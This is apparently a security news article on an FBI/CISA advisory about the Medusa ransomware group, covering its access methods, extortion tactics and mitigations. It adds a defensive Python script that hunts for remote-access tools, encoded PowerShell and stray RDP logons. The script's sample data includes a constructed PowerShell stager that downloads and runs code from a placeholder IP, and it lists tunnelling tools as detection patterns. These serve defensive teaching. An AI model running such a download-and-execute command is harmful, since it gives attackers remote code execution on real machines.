FBI and CISA warn of Medusa ransomware attacks impacting critical infrastructure. Learn about Medusa’s tactics, prevention tips, and why paying ransoms is discouraged.
A joint advisory by the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) has detailed a particularly aggressive threat: the criminal operation known as the Medusa ransomware gang.
According to the advisory (#StopRansomware: Medusa Ransomware), Medusa, a ransomware-as-a-service (RaaS) group first identified in June 2021, has become a serious threat to critical infrastructure sectors in the United States.
Authorities have identified a pattern of attacks affecting organizations across diverse sectors, including healthcare, education, law firms, insurance providers, technology companies, and manufacturers. Their victims include Bell Ambulance in Wisconsin, CPI Books, Customer Management Systems, and Heartland Health Center. The sheer number of victims, surpassing 300 as of December 2024, highlights the scope of this threat.
The actors gain entry in several ways, including phishing campaigns that steal credentials and exploitation of unpatched software vulnerabilities (e.g. the ScreenConnect authentication bypass, CVE-2024-1709). Once inside a network, they rely on legitimate system administration and remote-management tools so that their lateral movement blends in with normal activity.
They run a double-extortion model: victims' data is encrypted and rendered inaccessible, and the actors also threaten to publish sensitive information they have exfiltrated if their demands are not met. This places immense pressure on targeted organizations, which must weigh paying the ransom against the public disclosure of their data.
“Medusa developers typically recruit initial access brokers (IABs) in cybercriminal forums and marketplaces to obtain initial access to potential victims. Potential payments between $100 USD and $1 million USD are offered to these affiliates with the opportunity to work exclusively for Medusa,” the advisory (PDF) warns.
Medusa uses a range of techniques to conceal its activities, such as installing remote access software to control compromised systems and running obfuscated (base64-encoded) PowerShell scripts and tunnelling tools that create hidden connections back to its command-and-control servers, thereby evading detection by security software.
A particularly concerning aspect of this operation is the aggressive nature of their extortion tactics. Victims are given a very short window of time to pay the ransom, often just two days. They are pressured through direct communication, and if they fail to comply, their stolen data is made available on darknet websites. There are even reports that paying the initial ransom might not guarantee the end of the ordeal, as further demands may follow.
In response to this growing threat, federal agencies have emphasized the need to keep software patched and up to date, implement reliable access controls, and require multi-factor authentication (MFA). They also advise monitoring network activity for suspicious behaviour, restricting exposure of Remote Desktop Protocol (RDP), and segmenting networks to contain any potential breach.
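The advisory's monitoring advice is easier to act on with a concrete hunt. The script below is an added example, not code from the advisory or from either agency: it scans constructed Windows-style process-creation and logon records for three behaviours described above, namely remote-access tools the organization has not sanctioned, base64-encoded PowerShell command lines, and RDP logons (logon type 10) from outside an approved jump-host network. The tool names, the sanctioned-tool allowlist, the jump-host subnet and the sample events are all assumptions chosen for illustration.

```python
"""Hunt constructed endpoint telemetry for Medusa-style tradecraft.

Added example (not from the advisory). All event records below are constructed
for illustration; the allowlist and jump-host network are hypothetical values
that an organization would replace with its own.
"""
import base64
import ipaddress
import re
from dataclasses import dataclass

# Remote-access / RMM tool names to hunt for (lower-case substrings of the
# executable name). Assumed list for this example.
REMOTE_ACCESS_TOOLS = {
    "anydesk", "atera", "screenconnect", "splashtop",
    "simplehelp", "cloudflared", "ligolo",
}
# Hypothetical: the one remote-management tool this organization sanctions.
SANCTIONED_RMM = {"screenconnect"}
# Hypothetical admin VLAN from which interactive RDP is allowed.
JUMP_HOST_NET = ipaddress.ip_network("10.10.50.0/24")

# Matches -e, -ec, -enc, -encodedcommand followed by a base64 token.
ENC_PS = re.compile(r"-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)


@dataclass
class Finding:
    host: str
    rule: str
    detail: str


def rmm_name(image: str):
    """Return the matching remote-access tool name for an image path, or None."""
    name = image.rsplit("\\", 1)[-1].lower()
    for tool in REMOTE_ACCESS_TOOLS:
        if tool in name:
            return tool
    return None


def decode_encoded_command(cmdline: str):
    """If cmdline is PowerShell with an encoded command, return the decoded
    (UTF-16LE) script text; otherwise None."""
    if "powershell" not in cmdline.lower():
        return None
    m = ENC_PS.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return "<undecodable encoded command>"


def hunt(events):
    """Apply the three rules to a list of event dicts and return Findings."""
    findings = []
    for ev in events:
        if ev["type"] == "process":
            tool = rmm_name(ev["image"])
            if tool and tool not in SANCTIONED_RMM:
                findings.append(Finding(ev["host"], "unapproved-remote-access",
                                        f"{tool} started: {ev['image']}"))
            decoded = decode_encoded_command(ev.get("cmdline", ""))
            if decoded is not None:
                findings.append(Finding(ev["host"], "encoded-powershell", decoded))
        elif ev["type"] == "logon" and ev["logon_type"] == 10:  # RemoteInteractive
            src = ipaddress.ip_address(ev["src_ip"])
            if src not in JUMP_HOST_NET:
                findings.append(Finding(ev["host"], "rdp-from-outside-jump-net",
                                        f"RDP logon as {ev['user']} from {src}"))
    return findings


# Constructed sample telemetry (not real data). The encoded payload is a
# stager-style one-liner built here purely so the decoder has something to show.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a')"
    .encode("utf-16le")).decode()

SAMPLE_EVENTS = [
    {"type": "process", "host": "HR-PC01",
     "image": r"C:\Users\jdoe\AppData\Local\AnyDesk\AnyDesk.exe",
     "cmdline": "AnyDesk.exe --silent"},
    {"type": "process", "host": "IT-ADMIN",
     "image": r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.ClientService.exe",
     "cmdline": "ScreenConnect.ClientService.exe"},
    {"type": "process", "host": "FS01",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + _ENCODED},
    {"type": "logon", "host": "FS01", "logon_type": 10, "user": "admin",
     "src_ip": "10.10.50.12"},
    {"type": "logon", "host": "DC01", "logon_type": 10, "user": "svc_backup",
     "src_ip": "192.168.7.33"},
    {"type": "logon", "host": "DC01", "logon_type": 3, "user": "svc_backup",
     "src_ip": "192.168.7.33"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.host}: {f.detail}")
```

Run against the constructed sample, the hunt flags the AnyDesk start on HR-PC01, the encoded PowerShell on FS01 and the RDP logon to DC01 from outside the jump network, while ignoring the sanctioned ScreenConnect client, the RDP logon from the admin VLAN and the network (type 3) logon. In production the same rules would be expressed in the SIEM's query language over Sysmon or Security event logs.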
Moreover, organizations are urged to enforce MFA for webmail and VPN access in particular, since phishing and other social engineering are a significant entry point in these attacks. Any organization affected by Medusa ransomware is asked to report the incident to law enforcement and to refrain from paying the ransom demand.